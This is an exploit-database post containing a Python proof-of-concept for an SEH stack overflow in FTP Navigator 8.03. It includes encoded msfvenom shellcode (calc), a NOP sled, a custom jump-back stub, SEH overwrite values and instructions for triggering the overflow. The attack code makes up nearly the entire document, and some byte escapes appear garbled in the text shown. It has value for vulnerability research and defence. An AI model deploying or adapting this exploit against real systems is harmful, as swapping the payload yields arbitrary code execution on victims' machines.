FTP Navigator 8.03 – Stack Overflow (SEH)
# Exploit Title: FTP Navigator 8.03 - Stack Overflow (SEH)
# Date: December 28th, 2019
# Exploit Author: boku
# Discovered by: Chris Inzinga
# Original DoS: FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)
# Original DoS Link: https://www.exploit-db.com/exploits/47794
# Software Vendor: http://www.internet-soft.com/
# Software Link: https://www.softpedia.com/dyn-postdownload.php/5edd515b8045f156a9dd48599c2539e5/5dfa4560/d0c/0/1
# Version: Version 8.03
# Tested on: Microsoft Windows 7 Enterprise - 6.1.7601 Service Pack 1 Build 7601 (x86-64)
# Recreate:
#!/usr/bin/python
# 1) Generate 'poc.txt' payload using python 2.7.x
# 2) On target Windows machine, open the file 'poc.txt' with notepad, then Select-All & Copy
# 3) Install & Open FTP Navigator v8.03
# 4) Go to Menu Bar > FTP-Server Drop-down > click Custom Command
# - A textbox will appear on the bottom of the right window
# 5) Paste payload from generated txt file into textbox
# 6) Click "Do it"
# - The program will crash & calculator will open
blt = '33[92m[33[0m+33[92m]33[0m ' # bash green success bullet
err = '33[91m[33[0m!33[91m]33[0m ' # bash red error bullet
try:
nops = 'x90'*400
# msfvenom -p windows/exec CMD='calc' -b 'x00' --platform windows -v shellcode -a x86 -f python -e x86/alpha_upper
#x86/alpha_upper succeeded with size 447 (iteration=0)
shellcode = b""
shellcode += b"x89xe7xdaxd6xd9x77xf4x58x50x59x49"
shellcode += b"x49x49x49x43x43x43x43x43x43x51x5a"
shellcode += b"x56x54x58x33x30x56x58x34x41x50x30"
shellcode += b"x41x33x48x48x30x41x30x30x41x42x41"
shellcode += b"x41x42x54x41x41x51x32x41x42x32x42"
shellcode += b"x42x30x42x42x58x50x38x41x43x4ax4a"
shellcode += b"x49x4bx4cx4ax48x4dx52x35x50x35x50"
shellcode += b"x33x30x53x50x4cx49x4dx35x50x31x39"
shellcode += b"x50x52x44x4cx4bx50x50x56x50x4cx4b"
shellcode += b"x46x32x44x4cx4cx4bx31x42x42x34x4c"
shellcode += b"x4bx42x52x46x48x34x4fx4fx47x51x5a"
shellcode += b"x51x36x36x51x4bx4fx4ex4cx37x4cx33"
shellcode += b"x51x33x4cx44x42x56x4cx57x50x4fx31"
shellcode += b"x58x4fx54x4dx45x51x4fx37x5ax42x4b"
shellcode += b"x42x36x32x30x57x4cx4bx51x42x34x50"
shellcode += b"x4cx4bx50x4ax57x4cx4cx4bx30x4cx32"
shellcode += b"x31x34x38x4bx53x57x38x43x31x4ex31"
shellcode += b"x46x31x4cx4bx31x49x51x30x45x51x48"
shellcode += b"x53x4cx4bx47x39x44x58x4bx53x37x4a"
shellcode += b"x31x59x4cx4bx56x54x4cx4bx35x51x4e"
shellcode += b"x36x50x31x4bx4fx4ex4cx39x51x38x4f"
shellcode += b"x34x4dx45x51x59x57x30x38x4bx50x43"
shellcode += b"x45x5ax56x55x53x33x4dx4ax58x57x4b"
shellcode += b"x53x4dx31x34x54x35x4ax44x36x38x4c"
shellcode += b"x4bx31x48x36x44x45x51x38x53x35x36"
shellcode += b"x4cx4bx44x4cx30x4bx4cx4bx30x58x35"
shellcode += b"x4cx53x31x49x43x4cx4bx44x44x4cx4b"
shellcode += b"x55x51x38x50x4dx59x47x34x31x34x56"
shellcode += b"x44x51x4bx51x4bx55x31x46x39x31x4a"
shellcode += b"x30x51x4bx4fx4dx30x31x4fx31x4fx50"
shellcode += b"x5ax4cx4bx42x32x4ax4bx4cx4dx31x4d"
shellcode += b"x53x5ax33x31x4cx4dx4bx35x48x32x33"
shellcode += b"x30x55x50x33x30x56x30x32x48x30x31"
shellcode += b"x4cx4bx42x4fx4dx57x4bx4fx38x55x4f"
shellcode += b"x4bx4cx30x4fx45x59x32x56x36x55x38"
shellcode += b"x59x36x5ax35x4fx4dx4dx4dx4bx4fx59"
shellcode += b"x45x37x4cx54x46x43x4cx54x4ax4dx50"
shellcode += b"x4bx4bx4bx50x34x35x33x35x4fx4bx51"
shellcode += b"x57x32x33x53x42x52x4fx42x4ax35x50"
shellcode += b"x50x53x4bx4fx39x45x42x43x53x51x42"
shellcode += b"x4cx32x43x53x30x41x41"
jmp2nops = 'xe8xffxffxffxff' # call +4 // This call will land us at the last xff of our call instruction
jmp2nops += 'xc3' # ret/inc ebx // Since EIP is at xff after call, this will be interpruted as: xffxc3 =inc ebx (a nop instruction)
jmp2nops += 'x59' # pop ecx // Pop the memory location from the call instruction that was pushed onto the stack into the ECX register
jmp2nops += 'x31xd2' # xor edx, edx // Clear the EDX register. We are going to jump to the beginning of our buffer.
jmp2nops += 'x66x81xcaxfcx0f' # or dx, 4092 // EDX is now equal to 0x00000ffc
jmp2nops += 'x66x29xd1' # sub ex, dx // We subtract 4092 bytes from our memory location in the ECX register.
jmp2nops += 'xffxe1' # jmp ecx // Now we jump back to the beginning of our buffer; into our NOP sled.
offset = 'x41' * (4112-len(nops+shellcode+jmp2nops))
nSEH = 'xebxebx90x90' # jmp short -22 (to jmp2nops)
# 0x00457576 [ftpnavi.exe] : pop edx # pop ebx # ret
# | Rebase: False | ASLR: False | SafeSEH: False
# | (c:FTP Navigatorftpnavi.exe) | startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ}
SEH = 'x76x75x45' # SEH 3 byte overwrite
payload = nops+shellcode+offset+jmp2nops+nSEH+SEH
File = 'poc.txt'
f = open(File, 'w') # open file for write
f.write(payload)
f.close() # close the file
print blt + File + " created successfully "
except:
print err + File + ' failed to create'
https://www.exploit-db.com/exploits/47812
Gloss